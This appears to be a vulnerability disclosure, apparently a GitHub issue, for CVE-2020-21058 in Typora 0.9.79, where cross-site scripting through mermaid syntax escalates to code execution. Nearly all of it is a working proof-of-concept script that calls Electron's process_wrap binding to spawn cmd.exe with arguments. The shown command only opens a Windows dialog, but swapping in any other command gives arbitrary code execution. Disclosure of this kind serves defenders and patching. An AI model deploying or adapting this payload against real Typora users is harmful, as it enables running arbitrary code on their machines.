Headline
CVE-2020-21058: typora(0.9.79) XSS to RCE · Issue #2959 · typora/typora-issues
Cross Site Scripting vulnerability in Typora v.0.9.79 allows a remote attacker to execute arbitrary code via the mermaid sytax.
<script>
var Process = top.process.binding('process_wrap').Process;
var proc = new Process();
proc.onexit = function (a, b) {};
var env = top.process.env;
var env_ = [];
for (var key in env) env_.push(key + '=' + env[key]);
proc.spawn({
file: 'cmd.exe',
args: ['/k netplwiz'],
cwd: null,
windowsVerbatimArguments: false,
detached: false,
envPairs: env_,
stdio: [{
type: 'ignore'
}, {
type: 'ignore'
}, {
type: 'ignore'
}]
});
</script>